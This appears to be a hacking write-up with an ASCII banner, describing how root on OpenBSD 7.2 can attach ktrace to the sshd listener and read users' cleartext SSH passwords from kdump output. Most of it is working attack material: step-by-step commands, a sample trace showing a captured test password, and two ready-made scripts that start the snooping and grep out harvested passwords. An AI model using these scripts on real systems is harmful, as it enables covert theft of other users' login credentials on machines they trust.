____    ____    __  __                                                                      
/\  _`\ /\  _`\ /\ \/\ \                                              __                     
\ \,\L\_\ \,\L\_\ \ \_\ \        ____    ___     ___     ___   _____ /\_\    ___      __     
 \/_\__ \\/_\__ \\ \  _  \      /',__\ /' _ `\  / __`\  / __`\/\ '__`\/\ \ /' _ `\  /'_ `\   
   /\ \L\ \/\ \L\ \ \ \ \ \    /\__, `\/\ \/\ \/\ \L\ \/\ \L\ \ \ \L\ \ \ \/\ \/\ \/\ \L\ \  
   \ `\____\ `\____\ \_\ \_\   \/\____/\ \_\ \_\ \____/\ \____/\ \ ,__/\ \_\ \_\ \_\ \____ \ 
    \/_____/\/_____/\/_/\/_/    \/___/  \/_/\/_/\/___/  \/___/  \ \ \/  \/_/\/_/\/_/\/___L\ \
                                                                 \ \_\                /\____/
                                                                  \/_/                \_/__/ 


-------------------------------------
SSH password snooping on OpenBSD 7.2 
-------------------------------------


# First get a parent PID of the SSHD 

openbsd72# ps -aux | grep ssh | grep -v grep
root     17831  0.0  0.0  1100  1176 ??  I       1:06PM    0:00.14 sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups (sshd)
root     42012  0.0  0.1  1172  3568 ??  I       1:06PM    0:00.51 sshd: user [priv] (sshd)
user     73361  0.1  0.1  1672  3456 ??  S       1:06PM    0:25.17 sshd: user@ttyp0 (sshd)
openbsd72# 

 
In this case it will be the PID 17831 

# Then initiate ktrace on the PID and all the corresponding IO 

ktrace -idg 17831
rm ktrace.out    < ! This is important otherwise it will just grow big and fill up disk >  
ktrace -ti -p  17831 

# It will produce a ktrace.out file in the current $PATH 

# Then test and SSH to the box from outside using some dummy wrong password 
# I have used a dummy password "FUCKTHIS" 

# Read the text from the ktrace.out via kdump 

kdump -f ktrace.out 

# The cleartext password supplied to the SSHD is located in a few places, but the most 
  reliable one I could see is just above the NAMI /usr/libexec/auth/login_passwd filename lookup call    

 43482 sshd     RET   write 1
 13409 sshd     CALL  dup2(8,3)
 13409 sshd     RET   dup2 3
 43482 sshd     CALL  write(5,0x1f15487218,0x9)
 43482 sshd     GIO   fd 5 wrote 9 bytes
       "FUCKTHIS\0"
 43482 sshd     RET   write 9
 13409 sshd     CALL  closefrom(4)
 43482 sshd     CALL  read(5,0x1ef4282068,0x2000)
 13409 sshd     RET   closefrom 0
 13409 sshd     CALL  execve(0x7ffffe3da0,0x7ffffe3a08,0x1f2a1f2210)
 13409 sshd     NAMI  "/usr/libexec/auth/login_passwd"
 13409 sshd     ARGS  
        [0] = "passwd"
        [1] = "-s"
        [2] = "response"
        [3] = "--"
        [4] = "user"
        [5] = "staff"
 13409 login_passwd NAMI  "/usr/libexec/ld.so"

# To stop all ktrace dumping run  

ktrace -C 



# In order to automate all the above here are 2 simple scripts 

# START-SNOOP-SSH.sh 

echo "  /----------------------------/" 
echo " / OpenBSD OpenSSH  SNOOPER   / "
echo "/----------------------------/  " 

echo "started to dump SSHD process" 

sshpid=$(ps -aux | grep "\/usr\/sbin\/sshd"  | awk '{print $2}')
ktrace -idg $sshpid 
rm -f ktrace.out
ktrace -ti -p $sshpid 
echo "" 
echo "Now wait for somebody to SSH to this machine with a password" 

----------------------------------------------------------

# READ-SNOOP-SSH.sh 

kdump -f ktrace.out > TEXT 

grep -A 6 -B 8 -R "NAMI  \"\/usr\/libexec\/auth\/login_passwd\"" TEXT   |grep -v GIO |  grep -v RET | grep -v CALL | grep -v ARGS | grep -v NAMI  | grep -v "\[0\]"  | grep -v "\[1\]" | grep -v "\[3\]" | grep -v "\[2\]"
rm -f TEXT 

----------------------------------------------------------